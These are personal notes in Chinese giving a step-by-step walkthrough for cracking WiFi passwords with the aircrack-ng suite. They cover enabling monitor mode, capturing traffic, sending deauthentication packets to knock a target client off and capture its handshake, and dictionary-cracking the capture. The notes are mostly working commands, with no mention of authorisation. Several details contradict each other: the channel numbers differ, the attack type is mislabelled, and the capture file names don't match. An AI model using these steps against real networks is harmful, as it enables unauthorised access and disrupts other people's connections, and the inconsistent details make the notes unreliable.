WIFI研究

系统:MAC+VM(cyborg hawk)

硬件:USB无线网卡

1ifconfig检测是否有无线网卡wlan0   iwconfig

     如果没有,运行ifconfig -a 如果有,可以通过命令ifconfig wlan0 up加载网卡

2、激活无线网卡至monitor即监听模式

    sudo airmon-ng start wlan0

3、先进行预来探测,来获取当前无线网络概况,包括APSSIDMAC地址、工作频道、无线客户端MAC及数量 (通过这个过程查看具体的无线信号(AP MAC+相关客户端MAC)

   sudo airodump-ng mon0

4、更新airodump-ngOUI

    sudo airodump-ng-oui-update

5、开启无线数据包抓包工具

   airodump-ng -c 11 –w longas wlan0

–ivs 这里的设置是通过设置过滤,不再将所有无线数据保存,而只是保存可用于破解的IVS数据报文,这样可以有效地缩减保存的数据包大小;(该参数我在测试中没有使用,添加后是否能成功不确定)

-c 这里我们设置目标AP的工作频道,通过刚才的观察,我们要进行攻击测试的无线路由器工作频道为6

-w 后跟要保存的文件名,这里w就是“write的意思,所以输入自己希望保持的文件名,如下图10所示我这里就写为longas。那么,小黑们一定要注意的是:这里我们虽然设置保存的文件名是longas,但是生成的文件却不是longase.ivs,而是longas-01.ivs

6、另外开一个命令终端 (对目标AP使用ArpRequest注入攻击)

sudo aireplay-ng -0 10 -a apMAC -c 客户端的MAC wlan0

参数-0 10攻击10次

MAC-都是在第三步获取的,(第三步开始的一瞬间可以看到 apMAC和客户MAC的对应,时间长了有时候显示不出来)

7、破解

  aircrack-ng -w ./test.txt ./longas-02.cap

  test.txt-密码字典文件

 longas-02.cap-捕获的数据包

 执行后如果能看到(1 handshark)字样,说明对应的ap可以破解,否则破解不了

(根据实际操作会不断更新)